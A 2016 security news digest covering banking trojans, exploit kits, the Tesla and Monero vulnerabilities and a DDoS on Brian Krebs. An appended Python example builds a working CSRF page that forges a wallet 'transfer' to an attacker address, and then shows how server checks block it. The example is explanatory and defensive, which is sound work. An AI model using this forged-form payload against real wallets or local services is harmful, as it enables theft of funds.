2016-09-21

Malware

Qadars trojan

The Qadars trojan [1], now several years old, has been turned toward UK banks. The trojan, which can steal banking credentials and gain administrative rights on infected systems, has been seen attacking 18 separate banking institutions in the UK and other European countries. The malware is thought to have originated in Russia, and its creators are thought to be organised and professional, as evidenced by the numerous patches and versions of Qadars that have been spotted. It is by no means as prevalent as Dridex [2], but this reflects the attackers' need to maintain a low profile rather than a less advanced trojan. More information [3].

Tordow trojan

Formally identified as 'Trojan-Banker.AndroidOS.Tordow.a', Tordow [4] was discovered in February 2016 and has been infecting smartphones, rooting the devices, then stealing users' data and uploading it to the author's server. The trojan is primarily distributed via clones of popular Android apps, duping users into downloading them and then installing malicious code. Once installed, it has root access, allowing it to steal contacts, make calls, and send or delete SMS messages. Targeting the databases of the Android stock browser and Chrome for Android, the trojan extracts saved passwords and also steals the user's photos. More information [5].

Ongoing Campaigns

RIG taking over from Neutrino

In the ever-competitive market of exploit kits, the RIG EK [6] has become a frontrunner. As Infosecurity Magazine reports, RIG has taken the position that Angler [7] and Neutrino once held and is carrying out a large malvertising campaign aimed at injecting scripts that redirect to rogue domains. Among other malware, RIG is currently deploying a version of the CrypMIC ransomware to devices that follow the infected adverts.

The news of a rise in RIG detections comes at the same time as Malwarebytes found RIG on the Just For Men website, hidden in a pop-up on its front page. Combe, the parent company of Just For Men, has since updated the version of WordPress it uses and the compromise has been cleared. More information [8].

Malware targets Reddit users' cryptowallets

Several Reddit users are seeing their cryptowallets targeted by an unnamed drive-by-download malware, with some users having funds stolen. While details are still scarce, some reports suggest that the attack consists of malicious links designed to appeal to those monitoring changes in Bitcoin prices. With bait disguised as "price updates", victims are redirected to a website called "CryptoChartiq" and, according to posts on Reddit, this has resulted in accounts being hijacked and used to post links to malware, or even to compromise and empty e-wallets. More information [9].

Trending Vulnerabilities

Tesla hack

A group of hackers has demonstrated that they can take control of Tesla vehicles from 12 miles away via a malicious Wi-Fi connection. Once the car is connected, major functions such as the door and boot locks can be controlled, and the brakes can be applied remotely. The hack was carried out by Tencent's Keen Security Lab, a top-end Chinese research group, who did so in order to alert the manufacturer to the issue before it could be exploited. Tesla has announced that a patch will be issued within the next 10 days. More information [10].

Cryptocurrency Monero vulnerability disclosed

A vulnerability allowing attackers to steal Monero (a popular alternative to Bitcoin) from wallets was reported by security firm MWR InfoSecurity on Monday. Using a CSRF (Cross-Site Request Forgery), a Monero user would be tricked into visiting a web page containing malicious code; that code would make the victim's own browser send forged requests to the wallet, releasing funds to the attacker. The flaw has been patched in the latest Monero software update, but there are still worries that the vulnerability can affect users of third-party wallets, who are likely to be less technically savvy than those using Monero directly. More information [11].

General News

North Korean Internet domains leaked

In a leak from the country's DNS servers, it appears that there are only 28 websites on the North Korean Internet, none of which are Western. One of the country's top-level name servers was accidentally configured to allow global DNS zone transfers; a zone transfer (AXFR) hands the complete list of a zone's records to whoever asks, which is why it is normally restricted to a server's own secondaries. This was detected by the TL;DR Project and the resulting data was put onto GitHub for everyone to see. The impression we get is that the North Korean Internet is rather basic. More information [12].

Brian Krebs targeted with DDoS attack

KrebsOnSecurity.com, the website of cybercrime journalist Brian Krebs, was hit by a major distributed denial-of-service (DDoS) attack that he claimed could be the largest on record. The attack peaked at 665 Gbps and 143 million packets per second, and combined several DDoS techniques, including SYN and HTTP floods. Despite its scale, the attack did not take the site down, thanks to Krebs's DDoS mitigation provider. It is believed that a botnet consisting mainly of Internet of Things devices was used, but there is as yet no information on who was behind the attack. More information [13].

The Silobreaker Team

Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.
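The CSRF pattern in the Monero item above, shown as an added example that is not from this digest, from Monero or from MWR: a wallet exposing a JSON-RPC endpoint on the loopback interface, a web page that makes the victim's browser POST a forged "transfer" call to it, and the checks that defeat the forgery. The port, method name, parameter layout, addresses and the token header are assumptions chosen for illustration; the actual Monero fix is described in the MWR advisory [11].

```python
"""
Generic illustration of a CSRF attack on a wallet JSON-RPC listener bound to
localhost, beside the server-side checks that stop it. Not Monero's code.
"""
import json

WALLET_RPC_URL = "http://127.0.0.1:18082/json_rpc"   # assumed local RPC listener
RPC_TOKEN = "constructed-shared-secret"              # assumed secret known only to the real client
ATTACKER_ADDRESS = "attacker-address-placeholder"    # constructed, not a real address

# Page script cannot send application/json cross-site without a CORS preflight,
# but an HTML form with enctype="text/plain" is submitted with no preflight.
# Its body is "<name>=<value>", so splitting the JSON across the input's name
# and value yields a body that still parses as JSON (the "x" key swallows the "=").
FORM_NAME = ('{"jsonrpc":"2.0","method":"transfer","params":'
             '{"destinations":[{"address":"%s","amount":100}]},"x":"' % ATTACKER_ADDRESS)
FORM_VALUE = '"}'
MALICIOUS_PAGE = (
    '<form id="f" method="POST" action="%s" enctype="text/plain">\n'
    "<input name='%s' value='%s'></form>\n"
    '<script>document.getElementById("f").submit()</script>'
) % (WALLET_RPC_URL, FORM_NAME, FORM_VALUE)


def forged_body() -> str:
    """The request body a browser produces when MALICIOUS_PAGE auto-submits."""
    return FORM_NAME + "=" + FORM_VALUE


def parsed_forged_body() -> dict:
    """Shows that the text/plain body is accepted by a naive JSON parser."""
    return json.loads(forged_body())


# Constructed requests as the wallet process would see them (headers + body).
CSRF_REQUEST = {
    "headers": {"Origin": "http://evil.example", "Content-Type": "text/plain"},
    "body": forged_body(),
}
LEGIT_REQUEST = {
    "headers": {"Content-Type": "application/json", "X-RPC-Token": RPC_TOKEN},
    "body": json.dumps({"jsonrpc": "2.0", "method": "transfer",
                        "params": {"destinations": [{"address": "own-cold-wallet", "amount": 5}]}}),
}


def dispatch(req: dict) -> dict:
    """Execute a parsed JSON-RPC call; both handlers share this part."""
    if req.get("method") == "transfer":
        dest = req["params"]["destinations"][0]
        return {"result": {"status": "sent", "to": dest["address"], "amount": dest["amount"]}}
    return {"error": "unknown method"}


def vulnerable_handle(request: dict) -> dict:
    """Trusts anything that parses as JSON: no origin, content-type or credential check."""
    return dispatch(json.loads(request["body"]))


def hardened_handle(request: dict) -> dict:
    """Rejects browser-forged requests before reaching the wallet logic."""
    headers = {k.lower(): v for k, v in request["headers"].items()}
    # 1. Defence in depth: a wallet RPC has no legitimate web callers, so any
    #    Origin or Referer header means the request came from a web page.
    if "origin" in headers or "referer" in headers:
        return {"error": "cross-site request rejected"}
    # 2. HTML forms cannot send application/json; requiring it defeats the
    #    text/plain trick and forces script callers into a CORS preflight that
    #    this server never approves.
    if headers.get("content-type") != "application/json":
        return {"error": "unsupported content type"}
    # 3. The primary control: a credential the attacker's page cannot know
    #    (the header name is an assumption for this example).
    if headers.get("x-rpc-token") != RPC_TOKEN:
        return {"error": "unauthorized"}
    return dispatch(json.loads(request["body"]))
```

Run against the constructed requests, `vulnerable_handle(CSRF_REQUEST)` reports a transfer to the attacker's address while `hardened_handle` rejects the same request at the first check; the legitimate client, which sends the JSON content type and the token and carries no Origin, still gets through. The credential is what actually closes the hole; the Origin/Referer and content-type checks only narrow the attack surface, since referrer policy can suppress Referer on some browsers.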

[1] https://my.silobreaker.com/view360.aspx?item=11_643575535#?q=Keyphrase:%22Qadars%22&rd=true
[2] https://my.silobreaker.com/view360.aspx?item=11_773406215#?q=Keyphrase:%22Dridex%20Malware%22&rd=true
[3] http://www.zdnet.com/article/data-stealing-qadars-trojan-malware-takes-aim-at-18-uk-banks/
[4] https://my.silobreaker.com/view360.aspx?item=11_1072630168#?q=Keyphrase:%22Tordow%20Trojan%22&rd=true
[5] https://securelist.com/blog/mobile/76101/the-banker-that-can-steal-anything/
[6] https://my.silobreaker.com/view360.aspx?item=11_741119288#?q=Keyphrase:%22RIG%20Exploit%20Kit%22&rd=true
[7] https://my.silobreaker.com/view360.aspx?item=11_657356627#?q=Keyphrase:%22Angler%20Exploit%20Kit%22&rd=true
[8] https://blog.malwarebytes.com/cybercrime/2016/09/just-for-men-website-serves-malware/
[9] http://www.scmagazine.com/drive-by-mlaware-targets-crypto-wallets-of-reddit-users/article/523383/
[10] http://keenlab.tencent.com/en/2016/09/19/Keen-Security-Lab-of-Tencent-Car-Hacking-Research-Remote-Attack-to-Tesla-Cars/
[11] https://labs.mwrinfosecurity.com/advisories/csrf-vulnerability-allows-for-remote-compromise-of-monero-wallets/
[12] http://www.theinquirer.net/inquirer/news/2471424/north-korean-dns-leak-finds-just-28-official-kp-sites
[13] http://www.securityweek.com/brian-krebs-blog-hit-665-gbps-ddos-attack